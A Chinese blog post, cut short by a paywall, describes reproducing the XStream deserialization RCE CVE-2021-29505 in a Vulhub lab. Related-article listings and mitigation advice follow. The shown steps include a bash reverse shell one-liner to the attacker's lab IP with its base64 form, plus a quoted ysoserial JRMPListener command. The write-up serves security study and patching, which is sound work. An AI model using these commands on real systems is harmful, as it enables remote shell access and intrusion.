记录自己的漏洞复现:XStream远程代码执行复现(CVE-2021-29505)

最新推荐文章于 2025-02-08 14:31:11 发布
原创 最新推荐文章于 2025-02-08 14:31:11 发布 · 1.3k 阅读 · 2 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#web安全 #java

本文介绍XStream 1.4.16及之前版本中存在的远程代码执行漏洞CVE-2021-29505,并详细展示了如何利用此漏洞获取目标系统的shell,最后提供了修复建议。

XStream远程代码执行复现(CVE-2021-29505)

链接: https://blog.youkuaiyun.com/DTSknanLP.

漏洞描述

XStream是一个轻量级、简单易用的开源Java类库,它主要用于将对象序列化成XML(JSON)或反序列化为对象。
XStream 在解析XML文本时使用黑名单机制来防御反序列化漏洞,但是其 1.4.16 及之前版本黑名单存在缺陷,攻击者可利用sun.rmi.registry.RegistryImpl_Stub构造RMI请求,进而执行任意命令。
一些其他相关漏洞:https://paper.seebug.org/1543/

(本漏洞笔者的观点是:通过POC使得靶机访问攻击机某一端口A,
此时A端口ysoserial实施攻击并监听另一端口B,目标反弹shell至攻击机端口B,完成复现)

测试环境及工具

Ubuntu18.04:IP-192.168.202.141
kali20:IP-192.168.202.128
ysoserial.jar: https://pan.baidu.com/s/1XflBuWFo-RkHUSkMQehLpg/提取码:tbp4

复现过程

Vulhub环境搭建后,进入root用户,然后对应目录下docker-compose up -d
之后访问http://your-ip:8080,将会得到该画面

获取反弹shell

攻击机kali下载好ysoserial.jar后,
bash -i>& /dev/tcp/192.168.202.128/23333 0>&1
进行base64编码后->
YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjIwMi4xMjgvMjMzMzMgMD4mMSA=

最低0.47元/天 解锁文章
Drinking-T
关注
NextGen Mirth Connect XStream反序列化远程代码执行漏洞(CVE-2023-43208)
0xSec
05-24 1011
NextGen Mirth Connect 4.4.1之前版本存在远程代码执行漏洞,未经身份认证的攻击者可利用该漏洞远程执行代码。
XStream反序列化命令执行漏洞复现CVE-2021-29505
Armandhe的博客
09-13 1287
XStream反序列化命令执行漏洞复现CVE-2021-29505) 我复现漏洞姐姐会不会生气啊,不像我只会心疼哥哥
xstream 远程代码执行CVE-2021-29505
YouthBelief的博客
11-14 1682
这里写目录标题0x01 漏洞描述0x02 影响范围0x03 漏洞复现环境搭建0x04 漏洞修复 0x01 漏洞描述 0x02 影响范围 0x03 漏洞复现 环境搭建 0x04 漏洞修复
Xstream漏洞复现CVE-2021-29505
Ashely的博客
09-24 3863
Vulhub漏洞环境搭建 拉取漏洞镜像 复现漏洞 一、Vulhub漏洞环境搭建 详见文章Vulhub靶场搭建(Centos7) 二、拉取漏洞镜像 1.进入到vulhub/Xstream/CVE-2021-29505目录下,执行 docker-compose up -d 等待拉取镜像。(默认拉取镜像速度很慢,建议换源,可参考https://blog.youkuaiyun.com/weixin_30565327/article/details/101108079) 2. ...
CVE-2021-29505 XStream远程代码执行漏洞复现
m0_56642842的博客
07-29 2262
0x00 简介 XStream是一个常用的Java对象和XML相互转换的工具,是用来处理XML文件序列化的框架,在将javaBean序列化,或将XML文件反序列化的时候,不需要其它辅助类和映射文件,大大简化了XML序列化工作。 0x01 漏洞概述 XStream官方发布安全更新,修复了多个XStream 反序列化漏洞,其中就包含了CVE-2021-29505。攻击者通过构造恶意的XML文档,可绕过XStream的黑名单,触发反序列化,从而造成CVE-2021-29505反序列化代码执行漏洞等。漏洞复杂度低,
XStream远程代码执行-CVE-2021-29505
thelostworld
05-25 489
XStream远程代码执行CVE-2021-29505 )一、简介描述XStream是一种OXMapping技术,是用来处理XML文件序列化的框架,在将javaBean序列化,或将XML文件反序列化的时候,不需要其它辅助类和映射文件,使得XML序列化不再繁琐。攻击者可以操纵已处理的输入流并替换或注入对象,从而执行从远程服务器加载的任意代码。二、影响版本:XStream <= 1.4.16三、环境搭建:https://raw.githubusercontent.com/vulhub/vulh
XStream远程代码执行漏洞
m0_57768075的博客
06-18 1602
受影响系统: XStream XStream < 1.4.16 描述: -------------------------------------------------------------------------------CVE(CAN) ID: CVE-2021-21345 XStreamXStreamXstream)团队的一个轻量级的、简单易用的开源Java类库,它主要用于将对象序列化成XML(JSON)或反序列化为对象。XStream 1.4.16之前版本存在远程代码执行漏洞远程
XStream 反序列化命令执行漏洞CVE-2021-29505
EC_Carrot的博客
08-21 907
漏洞简介 XStream 在解析XML文本时使用黑名单机制来防御反序列化漏洞,但是其 1.4.16 及之前版本黑名单存在缺陷,攻击者可利用sun.rmi.registry.RegistryImpl_Stub构造RMI请求,进而执行任意命令。 漏洞复现 我们需要自己的服务器上使用ysoserial的JRMPListener启动一个恶意的RMI Registry: java -cp ysoserial-master-SNAPSHOT.jar ysoserial.exploit.JRMPListener 1099
XStream 代码问题漏洞CVE-2021-21345)
FCH的博客
08-07 738
目前厂商已发布升级补丁以修复漏洞,建议受影响的用户,及时升级至1.4.16及以上版本。补丁获取链接:https://x-stream.github.io/download.html。这里我们在这边利用 exclusion 排除weixin-java-mp的子依赖,然后再单独引入指定版本的xstream。1,在idea中全文件搜索xstream中没有搜索到,可以在 idea tearminal 中执行命令,查找对应的依赖。xstream:jar:1.4.20 >= 官方建议升级版本1.4.16。
Struts2 REST 插件 XStream 远程代码执行漏洞 S2-052 复现过程
weixin_30871701的博客
09-08 657
Struts2 REST 插件 XStream 远程代码执行漏洞 S2-052 复现过程 参考文档:  S2-052的POC测试,高危Struts REST插件远程代码执行漏洞(S2-052)   http://blog.youkuaiyun.com/xwbk12/article/details/77862527?locationNum=3&fps=1  i春秋的报告...
CVE-2021-29505XStream远程代码执行漏洞通告
爱国小白帽
05-17 2269
报告编号:B6-2021-051703 报告来源:360CERT 报告作者:360CERT 更新日期:2021-05-17 1 漏洞简述 2021年05月17日,360CERT监测发现XStream官网发布了XStream安全更新,漏洞编号为CVE-2021-29505漏洞等级:严重,漏洞评分:9.8。 XStream是一种OXMapping技术,是用来处理XML文件序列化的框架,在将javaBean序列化,或将XML文件反序列化的时候,不需要其它辅助类和映射文件,使得XML序列化不再繁琐。 对此,360
XStream 反序列化命令执行漏洞复现CVE-2021-21351)
Vitaminapple的博客
04-19 2420
XStream是一个轻量级、简单易用的开源Java类库,它主要用于将对象序列化成XML(JSON)或反序列化为对象。XStream 在解析XML文本时使用黑名单机制来防御反序列化漏洞,但是其 1.4.15 及之前版本黑名单存在缺陷,攻击者可利用javax.naming.ldap.Rdn$RdnEntry及javax.sql.rowset.BaseRowSet构造JNDI注入,进而执行任意命令。
【已验证】CVE-2021-29505XStream远程代码执行漏洞通告
爱国小白帽
05-23 1565
报告编号:B6-2021-052101 报告来源:360CERT 报告作者:360CERT 更新日期:2021-05-21 1 更新概览 360CERT目前已经完成漏洞复现及poc验证。本次更新漏洞状态及复现截图。 具体更新详情可参考漏洞详情。 2 漏洞简述 2021年05月17日,360CERT监测发现XStream官网发布了XStream安全更新,漏洞编号为CVE-2021-29505漏洞等级:严重,漏洞评分:9.8。 攻击者可以构造特殊的xml请求包,使存在漏洞的服务器从攻击者控制的远程服务器加载恶
XStream 高危漏洞合集,XStream 组件反序列化漏洞
紫枫的博客
11-27 3167
CVE-2021-29505反序列化代码执行漏洞
关于XStream < 1.4.14 远程代码执行高危漏洞CVE-2020-26217)的详细验证方法
Lisoning的博客
02-08 911
注:本文仅可用于学习使用。XStreamJava 类库,用来将对象序列化成 XML ( JSON )或反序列化为对象。攻击者通过构造恶意的 XML,在受影响的 XStream 版本中绕过默认黑名单,触发远程代码执行
腾讯蓝军安全通告|XStream远程代码执行漏洞(CVE-2021-29505)
Tencent_SRC的博客
05-17 5978
前言上周五XStream官方发布安全更新,由于官方把需要公告的CVE-2021-29505(任意代码执行漏洞)链接贴错成了CVE-2020-26258(SSRF漏洞)链接,导致很多人没有重...
【已复现XStream 拒绝服务漏洞(CVE-2022-41966)安全风险通告
smellycat000的专栏
12-28 5481
奇安信CERT致力于第一时间为企业级用户提供安全风险通告和有效解决方案。安全通告XStream是一个Java对象和XML相互转换的工具,用来将对象序列化成XML(JSON)或将XML反序列化为对象,并提供所有的基础类型、数组、集合等类型直接转换的支持。近日,奇安信CERT监测到XStream中存在拒绝服务漏洞(CVE-2022-41966)XStream在将XML反序列化为对象时存在堆栈溢出,未...
xstream 远程代码执行 CVE-2021-29505 已亲自复现
qq_42430287的博客
12-26 2204
burp发送数据包后,会返回500状态码,未发送前是200,可以根据此来判断是否存在漏洞点。
CVE-2021-21351 XStream反序列化远程代码执行漏洞
m0_56642842的博客
08-13 3184
0x00 简介 XStreamJava类库,用来将对象序列化成XML (JSON)或反序列化为对象。XStream是自由软件,可以在BSD许可证的许可下分发。它是一种OXMapping 技术,是用来处理XML文件序列化的框架在将javaBean序列化,或将XML文件反序列化的时候,不需要其它辅助类和映射文件,使得XML序列化不再繁琐。 0x01 漏洞概述 在 1.4.16 版本之前的 XStream 中,存在一个漏洞,允许远程攻击者仅通过操纵处理后的输入流,解组时处理的流包含类型信息以重新创建以前编写的对
XStream 远程代码执行漏洞(CVE-2021-29505)漏洞分析
最新发布
06-26
### 漏洞原理分析 XStream 是一个用于将 Java 对象序列化为 XML 或 JSON 格式,并能够反向从这些格式中还原出对象的库。CVE-2021-29505 描述了 XStream 在处理恶意构造的 XML 输入时存在远程代码执行(RCE)漏洞。攻击者可以通过精心设计的 XML 文档,绕过 XStream 的黑名单机制,触发任意类的实例化,从而导致任意代码执行。 该漏洞的核心在于 XStream 默认情况下未正确限制反序列化过程中可以加载和实例化的类类型。当应用程序使用 `fromXML()` 方法解析不受信任的 XML 数据时,如果数据包含特定构造的类名和参数,就可能触发恶意代码的执行。这种行为通常利用了 Java 反射机制来调用构造函数或静态方法[^2]。 ### 影响范围 此漏洞影响所有使用 XStream 且版本小于等于 1.4.16 的应用。由于其高危性质,任何暴露给不可信输入的应用程序都应被视为潜在受影响的目标。值得注意的是,尽管漏洞本身易于利用,但实际攻击的成功与否高度依赖于目标应用程序的具体实现方式以及是否存在可被利用的接口请求路径[^2]。 ### 漏洞修复方案 官方针对此问题发布了更新版本,建议用户升级至 XStream 1.4.17 或更高版本。新版本引入了更严格的默认配置,包括但不限于: - **白名单机制**:仅允许一组预定义的安全类型进行反序列化。 - **自定义转换器**:开发者可以创建自己的转换器以控制哪些类型的对象可以被反序列化。 - **关闭自动检测功能**:避免自动识别并加载外部类文件。 此外,对于无法立即升级的情况,可以通过手动修改代码来缓解风险,例如显式指定允许反序列化的类型列表,或者在解析之前对输入进行严格校验。 ```java // 示例:设置白名单 XStream xstream = new XStream(); xstream.allowTypes(new Class[]{com.example.SafeClass.class}); ``` ### 安全建议 除了及时修补软件组件外,还应该审查现有的系统架构与编码实践,确保不会无意间引入类似的脆弱性。定期进行安全性测试和渗透测试可以帮助发现潜在的问题点。同时,保持对第三方库的安全公告关注也是维护系统整体安全性的关键步骤之一[^3]。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值